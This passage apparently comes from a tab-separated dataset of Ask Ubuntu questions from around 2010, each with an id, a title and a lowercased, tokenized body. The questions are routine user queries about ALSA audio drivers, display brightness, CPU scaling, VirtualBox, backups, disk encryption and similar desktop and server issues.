excess elements in struct initializer hpetimer.c:121 : warning : ( near initialization for ‘__param_frequency’ ) hpetimer.c:121 : warning : excess elements in struct initializer hpetimer.c:121 : warning : ( near initialization for ‘__param_frequency’ ) hpetimer.c:121 : warning : excess elements in struct initializer hpetimer.c:121 : warning : ( near initialization for ‘__param_frequency’ ) hpetimer.c:121 : error : extra brace group at end of initializer hpetimer.c:121 : error : ( near initialization for ‘__param_frequency’ ) hpetimer.c:121 : warning : excess elements in struct initializer hpetimer.c:121 : warning : ( near initialization for ‘__param_frequency’ ) make [ 1 ] : *** [ hpetimer.o ] error 1 make [ 1 ] : leaving directory `/usr/src/alsa/alsa-driver-1.0.9/acore' make : *** [ compile ] error 1 and then sudo make install gives me : rm -f /lib/modules/0.0.0/misc/snd* . *o /lib/modules/0.0.0/misc/persist.o /lib/modules/0.0.0/misc/isapnp.o make [ 1 ] : entering directory `/usr/src/alsa/alsa-driver-1.0.9/acore' mkdir -p /lib/modules/0.0.0/misc cp snd-hpet.o snd-page-alloc.o snd-pcm.o snd-timer.o snd.o /lib/modules/0.0.0/misc cp : can not stat `snd-hpet.o ' : no such file or directory cp : can not stat `snd-page-alloc.o ' : no such file or directory cp : can not stat `snd-pcm.o ' : no such file or directory cp : can not stat `snd-timer.o ' : no such file or directory cp : can not stat `snd.o ' : no such file or directory make [ 1 ] : *** [ _modinst__ ] error 1 make [ 1 ] : leaving directory `/usr/src/alsa/alsa-driver-1.0.9/acore' make : *** [ install-modules ] error 1 [ solution ] after screwing it all up , someone mentioned why not trying using the packages in synaptic - so i did . i have reinstalled the following packages and rebooter : -alsa-hda-realtek-ignore-sku-dkms -alsa-modules-2.6.32-25-generic -alsa-source -alsa-utils -linux-backports-modules-alsa-lucid-generic -linux-backports-modules-alsa-lucid-generic-pae -linux-sound-base - ( i think i listed them all ) after rebooting , the audio worked , both in speakers and headphones . i have no idea which is the package that made my audio work , but it certainly was one of them . [ /solution ]
9047	ca n't adjust brightness on my laptop	i 'm having difficulty in adjusting brightness on my acer aspire 4740 : screen 14.1-inch glossy led-backlit , 1366x768 res cpu intel core i5-430m 2.26-ghz ram 1gb ddr3 hdd 320gb graphics intel gma hd im using ubuntu 10.10 . i do not have this problem in ubuntu 10.04 , but this problem occur in ubuntu 10.10 . i ca n't decrease or increase my brightness even in compiz .
9048	how to bind mouse buttons to keys ?	i have a logitech mx400 laser mouse which has 5 buttons + 4 for vertical/horizontal scrolling . i would like it set up so instead of horizontal scrolling pressing right on the scrollwheel will send ctrl+tab and left will send ctrl+shift+tab , which will allow me to cycle through tabs in browsers . also , it would be nice if i could remap the middle button to one of the ones on the side as it is really hard to press down . another bonus would be if i could write a script that allows me to define what buttons do what dependent on which window is currently active . i have tried using xmodmap but i could only see how to rearrange buttons , not have them send key signals . thanks in advance . button map ( using xev ) : left 1 middle 2 right 3 scrollup 4 scrolldown 5 scrollleft 6 scrollright 7 backward 8 forward 9
9050	why are there two ssh daemons running in top ?	i have ubuntu 10.04.1 , ssh server is running fine , but i wonder , why there are two sshd instead of one ? is n't one multithreades daemon enough ? is this an option ?
9056	amd phenom ii x2 550 cpu not operating at full speed during xvid encode	i am running ubuntu 10.10 64bit on a system with an amd phenom ii x2 550 cpu overclocked to 3.5ghz ( from the default 3.1ghz ) . when i perform an xvid encode using k9copy/mencoder and check the speed of the cpu using cat /proc/cpuinfo , neither of the cores ever seem to go above 2400mhz ( sometimes less due to amd cool'n'quiet ) . assuming this is the true speed , how do i ensure that the processor operates at full speed when performing a cpu intensive task such as encoding video ? edit - some further info below : william @ optimus : /usr/bin $ sudo dmesg | grep `` powernow '' [ 0.985857 ] powernow-k8 : found 1 amd phenom ( tm ) ii x2 550 processor ( 2 cpu cores ) ( version 2.20.00 ) [ 0.985885 ] powernow-k8 : 0 : pstate 0 ( 3500 mhz ) [ 0.985886 ] powernow-k8 : 1 : pstate 1 ( 2400 mhz ) [ 0.985887 ] powernow-k8 : 2 : pstate 2 ( 1900 mhz ) [ 0.985888 ] powernow-k8 : 3 : pstate 3 ( 800 mhz ) william @ optimus : /usr/bin $ sudo dmidecode | grep `` max speed '' max speed : 3200 mhz william @ optimus : /sys/devices/system/cpu/cpu0/cpufreq/ondemand $ cpufreq-info cpufrequtils 007 : cpufreq-info ( c ) dominik brodowski 2004-2009 report errors and bugs to cpufreq @ vger.kernel.org , please . analyzing cpu 0 : driver : powernow-k8 cpus which run at the same hardware frequency : 0 cpus which need to have their frequency coordinated by software : 0 maximum transition latency : 8.0 us . hardware limits : 800 mhz - 3.50 ghz available frequency steps : 3.50 ghz , 2.40 ghz , 1.90 ghz , 800 mhz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 800 mhz and 3.10 ghz . the governor `` ondemand '' may decide which speed to use within this range . current cpu frequency is 800 mhz . cpufreq stats : 3.50 ghz:0.00 % , 2.40 ghz:5.63 % , 1.90 ghz:1.63 % , 800 mhz:92.74 % ( 109352 ) analyzing cpu 1 : driver : powernow-k8 cpus which run at the same hardware frequency : 1 cpus which need to have their frequency coordinated by software : 1 maximum transition latency : 8.0 us . hardware limits : 800 mhz - 3.50 ghz available frequency steps : 3.50 ghz , 2.40 ghz , 1.90 ghz , 800 mhz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 800 mhz and 3.10 ghz . the governor `` ondemand '' may decide which speed to use within this range . current cpu frequency is 800 mhz . cpufreq stats : 3.50 ghz:0.00 % , 2.40 ghz:8.58 % , 1.90 ghz:2.47 % , 800 mhz:88.95 % ( 76452 )
9060	vbox guest not receiving ip	i 'm using oracle/sun virtual box3.2 on ubuntu 10.04 desktop . the ip is not assigned to the guest virtual system and the mode of network is bridged . i even tried 'dhclient ' but it could not fetch . output of 'ifconfig ' : edit:1 actually i want to have both , the guest should have access to internet and as well as the host to guest networking
9065	how to integrate skype into pidgin ?	how to connect to oneâs skype account with pidgin ?
9069	pros/cons guid vs. mbr and ntfs vs. ext4 on portable external hard drives	i am currently running ubuntu 10.04 and my hard disk 's partitioning is set to master boot record with filesystem type ext4 ( version 1.0 ) . i have purchased several new western digital portable external hard drives ( 500 gb ) . when i checked them , they were set to mbr and ntfs . i have read that guid is superior to mbr . is that true ? in any case , i have set these portable hard drives to that system instead of mbr . ( i can , of course , change them back . ) i see no difference in anything , operation-wise or performance-wise . what would be the pros and/or cons of this ? when i formatted these drives as ext4 , however , i see , with no data on the drives , that about 23 gb was being used ( for something ) , reducing the amount of available space by that much . when i reformatted them as ntfs , i see only 73.5 mb being used , a considerable difference . can anyone here comment on the pros and/or cons of these various file systems and how they will benefit ( or detract ) from my overall usage of these drives ? or does n't it make any difference at all ? i 'm using these drives strictly as storage media . i thank you for your consideration .
9070	installing covergloobus	is there any easier way to install covergloobus 1.6 in ubuntu 10.10 ? ppa doesnt work , tried to compile it but failed , are there any other ways ? ?
9072	any way to upgrade from 9.04 to 10.10 with no cd drive ?	my cd drive is broken and i am still on 9.4 and i want to update or clean install straight to 10.10 . i do not care how i upgrade as long as i do not havew to use a cd drive or install the previous updates . i would also like to know if i can use a usb drive to install desktop edition ? thank you .
9080	booting from usb inside vmware workstation	i 'm attempting to install windows 7 inside a vmware workstation virtual machine using a bootable usb stick , however the vmware bios does not detect the stick , and so i can not boot from it . the stick works perfectly for installing windows directly onto the hdd ( which i 've already done ) so there 's no problem there , and the stick is being recognise by vmware as i have the option to disconnect it .
9084	low output volume	i have two laptops : dell xps m1210 and dell vostro 1400 . on ms windows the output volume is so loud that i just need to set volume to around 20 % to listen music and watch videos . i use bose triport in-ear headphones most of the times . on ubuntu , even if i set 100 % volume on the multimedia player , on the desktop volume manager as well , and also on the ncurses gui of alsa mixer , i get very low volume output . sometimes while playing some vidoes the volume is so low that i barely hear any words . i have struggled for two years since i started to use ubuntu to solve this mystery . the same sound card which gives excellent sound on ms windows fails miserably on gnu/linux . few weeks back i bought an asus 100px eee pc . to my surprise even it also has the same issue . i have tried many versions of ubuntu and also i have done manual compiles of alsa modules without any success . i have asked and read about it in every possible forums and howto 's . nothing has helped me to address the issue .
9085	recover data using photorec onto an external drive	i lost my windows vista while installing ubuntu . few people suggested me to use photorec to recover the data . i already installed testdisk . the place where i am confused is : i attached an external drive , got an icon on the the desktop , but i am not able to run the exe file which unlocks the drive . the drive is showing up under `` media '' with permissions drwx -- -- -- . my question is even if i am not able to unlock it , am i safe to proceed to back up data onto this drive ?
9089	where are all my empathy settings stored ?	i would like to know where empathy stores all my information , so as to be able to back it up and re-use on a different ubuntu machine . so far i have found only the conversation logs in ~/.local/share/empathy any idea where the rest is ( account information , buddies , favorite rooms , etc ? )
9092	importance of swap partition	what is the purpose of a swap partition ? how do i know i have just enough swap partition ? not too much/little . my ubuntu pc is used for typical stuff : web ( email , facebook , etc . ) some movies gaming is rare
9096	how can i enable video and audio codecs ?	i would like to know how can i enable video and audio codecs not included by default on ubuntu . thanks !
9101	automatically indenting text that wraps to the next line in gedit	i have a problem where text that wraps around to the next line is not indented so that it is aligned with the start of the upper line , and i end up with paragraphs of text identical to this one . hitting return at the end of the paragraph will indent the cursor do the correct position , but this is not a good way for me to work in the long term . i use gedit for writing latex files , and i like to structure them with indentations for readability purposes , but the only way to get the paragraphs to look the way they should is to insert a few tabs at the start of each line after i 've written it , which leaves large amounts of whitespace in the middle of the paragraph if i decide to go back and rewrite anything . is there a plugin that can do this for me ?
9103	how to burn an existing recovery partition to iso ?	i 'm using a laptop with a factory recovery partition . i 'd like to scrap it , but i do n't know if i might need it , so i 'd prefer to create an iso ( s ) from the partition if there 's a good technique/method . advice is appreciated . ( i should also mention that it needs to be a bootable iso . i 'm currently experimenting with using clonezilla to create images , and mkisofs to turn them into an iso . not sure yet if that will get the job done or if there 's a better way . )
9107	what tools do you use to monitor a web server ?	what tools do you use to monitor a ubuntu web server ? more specifically , i 'd like to monitor server uptime , resource usage ( ram , cpu , bandwidth , etc . ) , apache , mysql and php .
9108	quicken equivalent	i plan on switching my parents company to ubuntu ( or k or x , have n't decided yet ) and one of the most important things is if there is a quickens equivalent available for any of them ? something to manage taxes just as well .
9116	any way to change default resolution in gspca driver for webcam ?	who know how to change defaut resolution for my webcam : i 'm using a 4tech pk-52mf . gspca is working fine with this webcam only on 320x240 resolution . 640x480 is very bad with it.. but skype uses 640x480.. and i ca n't change default resolution for skype . ideas ?
9123	what 's the best way to secure a teamviewer/x11/vnc connection ?	i 'm fairly new to ubuntu so please bear with me . i use teamviewer on my windows machines and love it , even more so that there is an ubuntu version . as most will know it ca n't start on computer startup as a service on ubuntu so if my machine reboots for any reason i 'm screwed . obviously i do n't want to enable port 5900 to the outside world as even with a secure password vnc access is hackable . so , i have installed , configured and successfully tested openvpn which means i can `` see '' my machine but i 'm wondering what would be the best solution for remote controlling it if it at the login page with no user logged in . vnc ? x11 ( although i 'm sketchy as to what exactly this is ) . any help would be appreciated . thanks paul .
9126	what do i need to use to encrypt my usb hdd ?	i want to encrypt my usb hdd . and i want to do it with open source software . and i want to use only password for decryption . and i want to decrypt it using an ubuntu 10.04 livecd , with no internet-connection . and i do n't want solutions using e.g . : des with 56 bit . at least aes 256 bit please ! what is the solution ? thank you !
9128	how do i connect to my brother mfc-6800 over usb ?	how can i connect to my brother mfc-6800 printer over usb ? ( i have an answer to this question and i 'm posting it for the benefit of the next person , but please write a better answer if you can ! )
9135	best way to backup all settings , list of installed packages , tweaks , etc ?	if i want to make a backup of everything i have done since the fresh install of ubuntu , what are the possible options ? what all should i backup ? i want to get all the settings that i changed , all the packages i installed , etc .
9136	most non tech savvy friendly ubuntu version for a company to implement ?	for a company with non tech savvy computer users who will mainly need to upload/save pictures , send/receive emails , play solitaire/euchre , print envelopes , and manage taxes , what ubuntu version would you suggest installing on all their systems ? ubuntu ? kubuntu , xubuntu . some other one ? looking for the mix that does the most of this out of the box ( if any of them at all even come with an envelope printing application ) . thank you .
9143	enable threading in alpine ?	i 'm setting up alpine with 10.10 with my gmail account . however , i am having difficulty setting up the threaded view of email ( as in gmail ) . at setup , and in the config menu , i have selected the threading display style to `` show-thread-structure . '' nonetheless , i get a normal view of email in my inbox , with individual emails displayed separately even if they belong to the same thread . does anyone know what i need to do to fix this ?
9144	how do you make ubuntu one re-authenticate ?	i was trying to restart syncing with ubuntu one because it was not syncing my music folder . however , i accidently deleted my computer from the sync list : ( ubuntu one.com > account > view the machines connected to this account ) so , my question is , how do i re-add my computer to the list ? i am currently running ubuntu 10.10
9148	how can i change repository mirror from commandline ?	on the desktops , the package managers have convenient ways to change the sources.list for apt-get between different mirrors . is there a similar menu-kind of way of doing this from the command line ( i.e . on a server ) ? ( i am not looking for answer like using sed or manually editing the sources.list file , i know how to do that . i am looking for some application that knows the addresses of the mirrors similar to the package manager guis ) .
9153	abort active download of packages in ubuntu from terminal ?	i was downloading a package using the terminal . i actually wanted to install package 'a ' . but , by mistake started installing package 'b ' . i wanted to stop downloading 'b ' and start downloading 'a ' . i could n't able to do that . i reset my network connection . i could stop downloading the package b . but , the administrator directory was locked and was n't able to download other packages which made me to restart my system . what command should i use to abort the active download of packages in ubuntu ?
9156	how can i attach different signatures to individual emails using the same account in evolution ?	i currently have gmail set up as my default account with evolution . i have various signatures that i would like to use and select prior to sending specific emails . is there a way to : create a signature that is n't associated with a specific account have the option to attach a specific signature , or no signature at all . currently i have a work signature , a joke signature , a `` sent from ubuntu '' signature , and a couple of social network signatures . some of these are appropriate , but i would n't want to attach one of my joke signatures on a work email . sometimes all i want to do is just send the email without a signature . is there a way to do this using evolution ?
9159	rhythmbox plays static	rhythmbox works fine , but sometimes certain tracks wo n't be played ; sometimes when certain tracks are played all i hear is static/cracking sound with basically no sound at all . if i restart rhythmbox and play the same song/s again , they will play fine ( no static ) . any ideas ?
9161	change default installation directory for a program	i use a asus eee pc 901 with one 4gb ssd and one 8gb ssd with an installed ubuntu netbook remix 10.04 . because the 4gb ssd is much faster then the 8gb ssd , i installed unr on the 4 gb ssd and mounted the 8 gb ssd to the home directory . but now my space is very limited . thats the reason why i want to know how i can change the installation path of a program .
9162	is there an x app which can position the mouse relative to a window ( not the screen ) ?	i want to position the mouse in relation to a window . i 've tried several command-line apps which send keyboard and mouse messages to x , but they all seem to only place the mouse in relation to the screen . is there some command-line/script way of moving the mouse in relation to a window ?
9168	joining mp3 files losslessly	i have a bunch of mp3 files and i have their paths grouped in a text file . is it possible to join the relevant mp3 files based on the paths in the text file ?
9173	create deb from dvcs-source	is there a system in ubuntu which simplify the process of getting the sources from git , compile and package it into a deb ? i 'm looking for something similar to the pkgbuild in archlinux which can be configured with any kind of vcs repo as source and then packaged as that distributions package format .
9176	change the deskbar applet icon	can anybody explain me how i can change the deskbar panel-applet icon ? i ' ve try a few methods but no one works ... i ' ve try to change the .png file in the 'usr/share/deskbar-applet/art ' folder and also i ' ve try to add an icon called dekbar-applet.png in the current icon theme folder in 'usr/share/icons ' . thanks in advance . sorry for my bad english but i ' m italian .
9178	how can i apt-get from the maverick repository into lucid ?	there is a newer version of xdotool in the maverick repository . there are new features available which i need in the maverick version . is there a simple way to install the maverick version ? by simple , i do n't want to have to learn the intricacies of installing from source today , but am willing to understand the individual steps if available . i have n't quite figured out the whole .configure thing yet . so is there maybe a simple , one-off , way to get it via synaptic package manager ?
9181	how to let the browser prefer ipv6 over ipv4 ?	i installed miredo and have ipv6 up and running it seems . i can ping6 hosts and download webpages with wget or my webbrowser when i specify ipv6 addresses , however whenever i specify a hostname that is offered over both ipv4 and ipv6 the browser picks the ipv4 address for the connection . how can i change that and let the browser use ipv6 instead of ipv4 if available ? googling around i found a hint that browsers will prefer ipv4 over ipv6 for 6to4/teredo tunnels , but so far i have n't found an explanation why or how to change that .
9183	no ubuntu logo during startup	i have just installed ubuntu 10.10 on a sony vaio but , their is no ubuntu logo on boot all i get is a black screen some writing saying an error and then straight to the login screen . i really like the boot screen and if their is anyway to get the computer boot normally i would like to hear . thank you
9186	`` listen '' notification area icon is somehow green-ish	i installed the beautiful application `` listen '' this morning , however when i started it , its applet within the indicator menue was somehow shown green-ish . my first thought was that well , maybe the png is indeed with a green background ( even though that would n't make sense ) . but i checked all the icons in /usr/share/listen/img/ , and as far as i can tell , they 're all with a transparent background . i 'm running 10.04.1 netbook remix on a asus eeepc 1002ha
9189	upgrade while keeping home partition	my home directory is on a separate partition . i am on 10.10 from 10.04 via upgrade . how can i perform a clean install of 10.10 while keeping this partition ? will it perform as well as a clean install ? what will be lost and what will be kept ?
9197	why does removing gwibber-service get rid of indicator-me	i do n't use gwibber at all but when i go to remove gwibber-service it wants to remove indicator-me . i still use empathy so i like the indicator being in place . is there any way to have this removed and why does it want to remove this ? -- indicator-me is the indicator where you can change your online availability and access ubuntu one
9199	embedded gnu c library : binaries	update manager is showing `` embedded gnu c library : binaries '' under important security updates . why is that ? ( i am on a laptop do i really need them ? ) update : just to make it clear , i know what c is , and i usually program in it . hence , i am familiar with glibc not eglibc . so , what is eglibc required for ? or what is the difference between glibc & eglibc .
9206	is there a preinstalled or automatic firewall ?	does ubuntu come with a preinstalled or automatic firewall ? if not , do i need one ? i 've read some articles about the advantages of linux over other operating systems about security ( no need to have antivirus , ... ) but would like to be sure . thank you very much !
9214	problem with release upgrade 9.04 to 9.10	i recently tried upgrade from 9.04 to 9.10 on my netbook , but something went wrong , and x session hang up . after reboot i still can log to system , but gnome is rather broken . i found that i can issue command `` sudo do-release-upgrade '' to continue upgrade , but it tries to do upgrade from 9.10 to 10.04 , even i have `` jaunty '' in /etc/apt/sources.list . i guess thats because some information in system has 9.10 in version , like `` lsb_release -a '' gives `` release : 9.10 '' my question is : where i should change release information , so `` sudo do-release-upgrade '' can do upgrade 9.04 - > 9.10 , not 9.10 - > 10.4 i know how to copy /home dir and reinstall system with preservation of this dir , i 'm just curios if there is way to rescue sys by working with apt-get , aptitude , and dpkg . i 'm sure that all changes were made only by these tools so maybe there is way to fix it . and , yes i know that 9.10 is a little bit outdated but it is still supported and i use it because of software compatibility .
9215	how to reconfigure graphics ( xorg )	the display on my laptop got corrupted after accidentally executing a script intended for my desktop with nvidia driver . the driver on my laptop is ( lspci | grep vga ) : intel corporation mobile gm965/gl960 integrated graphics controller ( rev 0c ) the laptop boots up fine in failsafe mode but when i try to reconfigure graphics using the option on screen , nothing happens and it stays on the same screen . i tried sudo dpkg-reconfigure xserver-xorg but there was no message and it came to next line . is there a simple way to reconfigure my xserver display and bring to back to the earlier stage .
9217	audo/video with pidgin ?	does anyone know how to make audio and video calls work with pidgin ( for those protocols that support it ) ? video is supposed to work on msn , and audio is supposed to work on google talk , but whatever i try the media- > audio call and media- > video call menu options are always greyed out . my microphone and webcam are plugged in and work ( and empathy 's video preferences can see them ) , so i know it 's not a hadware problem ; i have installed libgstfarsight0.10-0 and gstreamer0.10-plugins-bad ; but i still ca n't make pidgin do audio calls . this is with pidgin 2.7.3 and maverick . any ideas ?
9221	ca n't connect through wired connection	i used to be able to connect to wireless networks and wired networks ( although my wireless network had problems ; see my other question ) . then , one day , the section wired networks just disappeared ! and when i plugin a cable , nothing happens ! why ? despite having worked a while , the answer below seems to have stopped working for me . therefore , my question is still active , and i anxiously await any replies .
9229	excessive working of laptop fan	i have an hp dv4 laptop running ubuntu 10.10 . while booting up , the laptop fan just runs excessively for a few seconds until the login screen appears . then it functions normally for the rest of the session . i 've read somewhere that you can do some tweaking in boot options . when i checked it out it was given laptop fan always on : enabled so i disabled it . now , while running the system the fan alternatively picks up speed and then slows down . the laptop is not hot at all and the temperature is a bit cold here . any help will be appreciated : )
9230	how to access the shared folder between two computers running ubuntu	i have to computers running ubuntu and i want to share files between those computer . these computers are already connected through a cross cable and sharing internet connection using firestarter . both computers have samba installed . in desktop computer i have a shared folder how do i access it on the other one .
9232	i need a straight forward simple how to for nautilus clutter	i have followed many how-to videos , but those just wont work . could someone tell me or link me to a straightforward working video ? i currently do not have nautilus-elementary installed , in the past i 've installed it but the function still did n't work .
9233	implementing ncpmount into gdm	how would i be able to implement ncpmount into gdm ? ncpmount is a command that mounts the files of a novell netware account . i want to mount these files to the home directory when a user logs in . is this possible , because i am trying to set up ubuntu with my school .
9237	hot features of ubuntu	what are the hot features we find in ubuntu ?
9239	why i have to wait some seconds before i can input my password on login ?	when on login i click on the user , immediately shows password field but before i can type it i have to wait some seconds , sometimes even 5 ! i do n't see this problem on other computers that i have , only one has this behavior . anyone has this problem too ? how can i check which components slowdown login time ?
9242	how do i change xsetwacom and make the settings stay on startup ?	i am running ubuntu 10.10 and finally got a wacom bamboo pen & touch tablet to work . however , i would like to change some settings ( assign buttons ; remove touch feature ; ... ) and make them stay on startup . how can i do this ? thank you very much for your patience .
9246	how can i change some of the system sounds ?	how can i change sounds in ubuntu ? mainly i mean the sounds for startup , shutdown and warnings .
9248	is there a software utility to adjust screen gamma/brightness/contrast ?	i use to work at night and it is eye-hurting to watch at lightbulb-bright screens ( i 've got two - laptop 's built-in panel and an external 18-inch crt ) in a dark environment . so i adjust my screens to be darker . can i do this a software way instead of pressing monitors ' buttons that many times every time ?
9253	is it possible for the uk english upside-down option ?	i know that we have facebook uk english upside down version and i have seen images of people with ubuntu upside-down english as well does anybody know where to get it or how to get it . thank you .
9256	error while installing ubuntu on a pc	i was trying to install ubuntu 10.10 desktop edition on my pc today . i booted up from my livecd . then , i reached up to the ubuntu loading logo . it stayed there for a few minutes . but then i came to a black screen with the following printed on the screen : busybox v1.15.3 ( ubuntu 1 : ! .15.3-1ubuntu5 ) built-in-shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) mount : mounting /dev/loop0 on //filesystem.squashfs failed : input/output error can not mount /dev/loop0 ( /cdrom/casper/filesystem.squashfs ) on //filesystem.squashfs udevd [ 75 ] : worker [ 199 ] unexpectedly returned with status 0x0100 uvdevd [ 75 ] : worker [ 193 ] failed while handling '/devices/virtual/block/loop0' i have also filed a bug report regarding this error : error while installing ubuntu can someone help me with the error ?
9259	genius messenger 310 camera turned 180ยบ in karmic	i have a problem with the camera - in ubuntu the image appear turned 180ยบ does someone know the solution ?
9261	process hogging cpu	what is udpate-apt-xapi ? i was browsing when all of a sudden , the above process spawns using 100 % cpu and fan becomes louder . after a minute or so , it automatically subsides . from the name , i guess it is somehow related to apt , but why would it start automatically when i had just updated few hours ago and the update interval is set to 2 days . p.s . - ubuntu 10.10 , 2.6.35.22
9262	change `` liveusb '' default boot options	a friend of mine wants to use livecd to use ubuntu ( maverick ) . he is currently setting acpi=off every time manually . how can i set the default option to acpi=off . btw he didnt install ubuntu in his machine . he is directly booting from live cd . it is a live usb so i can edit anything .
9265	open source skype application	i 'm looking for an open source skype application that i can use instead of the current beta we have to install .
9269	system hangs on shutdown if windows network drive in fstab	i added a windows network drive ( accessed using wifi ) in my fstab about a month ago : //server/location/foo/bar /media/mynetworkdrive/ cifs auto , iocharset=utf8 , uid=umang , credentials=/root/.cifscredentials , file_mode=0775 , dir_mode=0775 0 0 and it works perfectly well , except it takes about a full minute for the system to shutdown . i have tried the solutions posted on the help wiki , the team wiki and on this blog . one of them worked for a few shutdowns but then the system went back to taking a minute to shutdown again . edit : i 'd like a working working around for this problem . currently , i have a script that unmounts ( password required for super-user priviledges ) and then shuts down the computer , but i 'd like to be able to shutdown the usual way and have it shutdown as fast .
9274	how to safely try kde ?	there 's a way to safely try kde on top of an ubuntu installation , keeping the possibility to revert the changes in case i dislike how it runs ?
9276	how can i sync my contacts ' information in empathy with evolution address book ?	evolution seems to be able to sync the contact list information in pidgin with its address book . however , is it possible to keep contact information ( i.e . display pic ) in empathy synchronized with evolution ?
9279	problems with java applet	please take a look at the following java applet : http : //www1.chapman.edu/~jipsen/gap/po4.html it is supposed to show some mathematical stuff with vertices and edges . the only thing i see is unfortunately one yellow dot . what might be the reason for this ? please tell me if you need more information .
9282	can you still defrag vista if you use wubi ?	would like to defrag vista seperately , understanding that ubuntu does not need it . while ubuntu files are included on the c drive will it cause problems ?
9284	how to make wine be quiet about msvcr errors ?	i downloaded the python 2.7 msi installer for windows and proceeded to install it with wine . it worked without any problems . however , running wine python.exe leads to a whole bunch of these errors : fixme : msvcrt : msvcrt__sopen : pmode 0x81b6 ignored the application technically works , but is very hard to use because of these error messages . ( they come up multiple times while the program is running . ) is there a way to tell wine to ignore these messages ?
9285	would anyone know why when i plug my headphones in , my speakers do n't turn off ?	any ideas , thoughts or suggestions
9286	upgrading virtualbox 3.2.10 breaks my guest ubuntu screen resolution	i had ubuntu 10.4 working fine with the previous version of virtualbox on a windows 7 host . then i upgraded to virtualbox to 3.2.10 , reinstalled the linux guest additions , and now i am limited to 1008 x 584 resolution in full-screen mode ! i have reinstalled guest additions and rebooted the guest os several times .
9290	adding a usb eject button to the panel/dock	i wish to have a unmounter for my usb drives . i use docky , and tied the in-built helper , but it displays the internal drives too . but i dont want all the drives , only those on usb . ca n't i have such an `` ejecter '' in the notification area ?
9293	how do i install curl in php5 ?	i currently have php 5.3 installed with apache in 10.04 lucid . how can i add the php curl libraries ? do i need to install any other dependencies for curl ?
9294	setting up ssh to a url	i have enabled ssh on one of my computer at home , so i can get to it from my main ip . no i have a domain where i forward it to my ip . lets say this website is called melikecandycoveredfrogs.com mapped to http : //myip/ i am able to run ssh myip and sucessfully connect but when i try ssh melikecandycoveredfrogs.com it does n't seem to work . i have the ports forwarded and everything . how can i achieve this ? does the http : // cause the issue ? please and thank you .
9303	bricked computer	so on my desktop , i decided to install ubuntu 10.10 , so i wiped it , the 10.04 system was n't working anyway , but whenever i try to boot from a usb it tells me that there 's a boot failure issue , and to hit enter , and when i put in a disk , the hardware does n't load ; keyboard , mouse , and the like , anything i can do ? this has n't happened before
9304	how to make a bootable iso image from a bootable dvd ?	i want to make a .iso image of a bootable os dvd , to use in virutalbox . nautilus can make a .iso , but only of data files , it seems . the .iso it created was not bootable . what is available to make a bootable .iso from a bootable dvd ?
9305	send to tomboy context menu	is there any way to add an option to right click menus for text files and/or highlighted text to `` send to tomboy '' so that it would create a new note with the contents of the text file or highlighted text as the contents of the new note ?
9306	do i need to defrag ext file systems ?	i 've been told that ext file systems do n't need to be defreagged because of the way they handle writes . is this true ? would i benefit from a defrag every now and then ? if so , what tools are best ?
9312	how to upgrade subversion to v1.6.13 ?	what is the best way to upgrade subversion to 1.6.13 on ubuntu 10.04 lts ? ubuntu 10.04 ships subversion 1.6.6 and important bug fix has been done for 1.6.13 .
9314	how to use drbd for entire system replication	i have installed and configured drbd on my ubuntu 9.10 servers , by following the links below . link text1 and link text2 i 'm in a plan to configure ubuntu servers for high availability , so i have tested drbd working and it 's fine as per the links i referred . but my major requirement is i could get other server into production if the main server gets down/corrupted . is it possible to configure drbd so that any changes made on primary server to '/ ' are replicated to secondary server ? . edit : dear experts : i have a ubuntu server which hosts apache , tomcat , mysql , ldap and so on . i do n't know how to say ... like if this server gets corrupted or malfunctions i should immediately get another system with same databases applications , services , files and directories ( just like a clone ) into working . i wondering if there is something like primary and secondary which replicate ( entire system ) each other and if in case the primary server fails i can immediately come up with the secondary . i 'm not only talking about drbd it might be any third party tool that meets my entire requirement . i have to do this by the time assigned to me . somehow you try to understand what i 'm in need of and put an end to this thank you !
9317	how is the magic trackpad 's battery life ( with ubuntu )	what are other peoples experiences are with the battery life of the apple magic trackpad using ubuntu ? i think i 've emptied included batteries after about two weeks usage for five days a week , eight hours a day . i do n't know for sure because there 's no battery level indicator , but i guess it 's empty because it does n't connect to the computer anymore . are there other people who use it as their main pointing device ? how long do your batteries last ? : - ) edit dec. 2 , 2010 allright , now i always turn the trackpad off when not using it . the batteries lasted 5-6 weeks this way , much better than the initial two weeks .
9318	how do i add shadow to my gnome menu bar ?	i reinstalled ubuntu 10.10 with compiz and have suddenly lost the gradient shadow on my gnome menu bar ( top ) , i was wondering how can i get it back ? i already have the value of `` any '' set in window decorations and the shadow is applied to windows , but just not the gnome bar . i 'm running the theme ambiance with the faneza icon set
9324	is there a way to get the administrator lock opened ?	i know that when a package is being installed , the root directory [ i think ? ] gets an administrator lock and ca n't make an other installation at the same time . is there a way to stop that installation ? if it is so , is it good to do ? i heard that it is better to leave the package to get installed and then try removing it . is that true ?
9325	what is the difference between `` man '' and `` info '' documentation ?	regarding man-pages and info help documentation : why do two such similar sources of documentation exist ? sometimes a man-page is available and the info is not ; or vice-versa . i have n't yet latched on to the rhyme and reason behind it . maybe there is a significant difference between them , but even if there is , why do they both exist ? it seems like unnecessary doubling up .
9329	recommendations for a windows media centre substitute ?	are there any suggestions for media centre that can be used on ubuntu 10.10 ? i need a media centre which works as same as the windows media centre , but i can drop the online shows = )
9335	gedit plugin development in c	i 'm interesting to write gedit-plugins in c i 've checked that http : //live.gnome.org/gedit/newmdipluginhowto but i find it not good to start how can i get another informations about writing gedit plugins in c ? any help will be appreciated thanks in advance .
9336	print numbered arguments in command line tool	is there a packaged program that shows command line arguments ? i often find it helpful to have users run this type of program to either help them understand what their shell commands do , or to get clearer , less ambiguous feedback ( e.g . when i ca n't see their screen and we 're communicating online with paste sites ) . i 've written the below script in python , which works , but i 'd find it easier to tell people a ubuntu package they can grab rather than explain how write to a file , chmod +x , and change their system ( e.g . maybe they do n't have ~/bin setup in path , ... ) . i 'd be happy to see a command-line sed/awk/perl/etc . script to do this functionality as well , even if it 's ugly . ( `` if '' ... doing this in one-line will be ugly . ) any solution needs to have somewhat similar results to this script ; which are , in english : print each argument with a number ( escaping problematic characters is just a bonus ) . # ! /usr/bin/env python2.6 import sys if len ( sys.argv ) == 1 : print `` no args ! '' else : args = enumerate ( sys.argv ) args.next ( ) # skip program name for i , v in args : r = repr ( v ) if v.strip ( ) ! = v or v ! = r [ 1 : -1 ] : v = r + `` \t ( repr ) '' print `` % 3d : % s '' % ( i , v )
